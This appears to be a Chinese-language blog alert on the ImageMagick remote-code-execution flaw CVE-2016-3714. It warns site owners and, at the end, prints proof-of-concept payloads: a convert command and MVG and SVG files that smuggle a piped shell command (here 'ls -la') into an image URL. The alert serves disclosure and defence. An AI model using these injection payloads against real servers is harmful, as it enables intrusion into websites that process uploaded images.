你的网站有ImageMagick高危漏洞吗?
ImageMagick是一个有着25年历史的开源免费图片处理软件,你也许没听过,也没见过它的logo,但只要你上过网,就一定有用到过。例如:上传你的头像或图片到网站或博客,供之后在网站或博客上使用。而就在今天,这个有着广泛使用量的ImageMagick爆出了高危漏洞(CVE-2016–3714),攻击者可以通过简单的上传恶意构造的图像文件到服务器触发服务器上的ImageMagick软件执行图片中的恶意代码进行攻击,这也就是我们常说的在目标服务器远端执行任意代码,属于高危漏洞。
由于ImageMagick历史久远,应用广泛,目前已确定含Wordpress、Drupal、Discuz等在内的知名应用都有可能受此漏洞影响。如果你是一个站长,请立即检查你的网站,如果网站服务器也有用到图片处理功能,例如:图片裁剪、尺寸缩放等等,那么很可能你的网站也存在ImageMagick高危漏洞,检查的方法就是看网站服务器上是否有安装ImageMagick相关的库。
攻击者给出了2个攻击方式,都很简单直接,甚至都不需要有编程基础,所以对广大网站而言,这是名副其实的高危漏洞,切不可掉以轻心。
一种是直接提供一个URL,里面使用管道接一个命令。
convert 'https://example.com"|ls "-la' out.png
一种是生成特殊的SVG或者MVG图片,里面包含了命令。
- exploit.mvg
- –=–=–=–=–=–=–=–=-
- push graphic-context
- viewbox 0 0 640 480
- fill ‘url(https://example.com/image.jpg”|ls “-la)’
- pop graphic-context
- exploit.svg
- –=–=–=–=–=–=–=–=-
- <?xml version=“1.0” standalone=“no”?>
- <!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN”
- “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd”>
- <svg width=“640px” height=“480px” version=“1.1”
- xmlns=“http://www.w3.org/2000/svg” xmlns:xlink=
- “http://www.w3.org/1999/xlink”>
- <image xlink:href=“https://example.com/image.jpg"|ls "-la”
- x=“0” y=“0” height=“640px” width=“480px”/>
- </svg>